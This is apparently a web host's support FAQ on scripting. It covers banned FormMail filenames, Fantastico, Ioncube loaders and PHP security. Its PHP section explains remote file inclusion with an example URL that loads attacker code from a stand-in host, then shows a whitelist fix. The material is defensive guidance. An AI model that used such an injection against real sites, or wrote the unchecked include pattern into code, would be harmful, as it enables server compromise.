Scripting
Click on question to view answer.
Why do you have banned scripts- For a number of reasons certain scripts and types of script are banned.
It is extremely important that clients check our terms and conditions, and the list of banned scripts in the Support section.
Your account will be put at risk if any of these scripts are installed/uploaded onto our servers.
If in doubt, please open a support ticket to ask us about any scripts which you are unsure of. - Can I use Formail scripts?
- These scripts are permitted but with restrictions to ensure that they are not abused by spammers.
First up, 'Matt's FormMail' script is banned and must not be used.
Secondly, you must rename your script so that it IS NOT called any of the following:
formmail.cgi
formmail.pl
formmail.php
upper/lowercase varients of the above.
This is to make life more difficult for automated scanners. Anything with the filenames above will not work on our server regardless of whether they exist or not.
We recommend using nms-formmail script for your 'form to email' script. Please see the How to section in Support for instructions. -
What is fantastico?
-
Fantastico is an application we have installed to assist with the installation and administration of many popular scripts.
Using this, clients can install scripts in their account with just a few mouse clicks. When updates to the scripts are released the installations can be upgraded by clicking a button in the cPanel.
To access Fantastico and see the full range of scripts please click the link marked 'Fantastico' on the front page of the control panel. -
How do I check for insecure scripts?
-
Using scripts in your account that are insecure (vunerabilities unpatched) is very dangerous. Doing so runs the risk of account suspension or exploit from a third party which can cause total account compromise, data loss or account suspension/termination (if used by the person for warez, spam, etc).
Therefore, it is extremely important that all scripts in use are the latest version and secure.
Other than good programming practise, and easy way to check how secure the script is, is to do a search for the script name along with the word 'exploit' in a search engine, such as www.google.com. This should provide you with a list of sites that will highlight any security related to the script you searched for. -
Is Zend Optimiser installed?
- Yes, Zend Optimizer is installed.
-
Is Ioncube loader installed?
-
We do not have the Ioncube loaders installed because they can be installed as and when required by clients with no intervention from us.
To do this you must first download the latest set of Ioncube loaders from their website. Make sure to choose the loaders for Linux Intel (or 'Linux (x86)' ) and the correct PHP version (check PHP version on front page of cPanel under 'Server Information'). Select the archive format which you are able to open on your system (zip for Windows).
The directory in the downloaded archive (called 'ioncube') should be placed in or above the top directory of the encoded files. For example, if you have encoded files/scripts in or below '/home/username/public_html/script' you might want to upload the 'ioncube' directory via FTP to '/home/username/public_html/script' or '/home/username/public_html'.
It's not working - why?
If encoded files fail to run after following the guide above, you can test this by using the PHP script 'ioncube-rtl-tester.php' which is included in the archive (in the 'ioncube' dir). Copy the 'ioncube-rtl-tester.php' PHP script to a directory where you expect encoded files to be working.
Access the script by entering the correct URL in a browser.
The script will try to locate and install the required Loader, and will produce output as it runs. -
What about PHP code security?
-
PHP code can be a very useful tool but also very dangerous if not used correctly. There are many coding mistakes that can lead to hacked websites, deleted files and other serious problems.
A common mistake of PHP coders is to program the website page access using index.php?page=page_name.html methods whereby the filename is included in the URL and included into the page via PHP code. The problems start when no checking is done before including the filename and can lead to problems when a third party simply changes the URL to include a bad script into the webspage allowing them to run any commands on the server, eg index.php?page=http://www.bad-url.com/hacking_php_code.txt
The above example will include whatever bad code (designed to hack the website/server and basically anything else) in the text file at http://www.bad-url.com/hacking_php_code.txt and execute it within the script as PHP on our server. It's easy to think "it will never happen to me" if your site is new but it is very easy to find countless sites using this method of access via a Google search which the attacker will systematically test for insecure code (often automated scans).
To protect a website against the exploit above, it is essential to check the value provided in the URL before including it into the PHP code. This can be done by hardcoding a set of allowed files to be included and if the filename in the URL is not found in this list, the request will be rejected.
1. Put an array at the very top of the file with the names of all the allowed files, eg: $allowed = array("main", "subpage", "another");
2. When you get to the bit where the URL is examined and included in the PHP code you can then do something like this to check it is in the allowed list:
$page = $_GET['page'];
if(in_array($page, $allowed)){ include("/home/USERNAME/public_html/" . $page . ".html");}else{ die("Hack attempt stopped");}
It is the responsibility of all those using custom PHP scripts to ensure that the code used is as secure as possible. There are many articles on the internet covering this subject and we recommend checking the following links:
Google Search
Onlamp.com: Ten Security Checks for PHP, Part 1
Onlamp.com: Ten Security Checks for PHP, Part 2
Zend.com: Secure Programming in PHP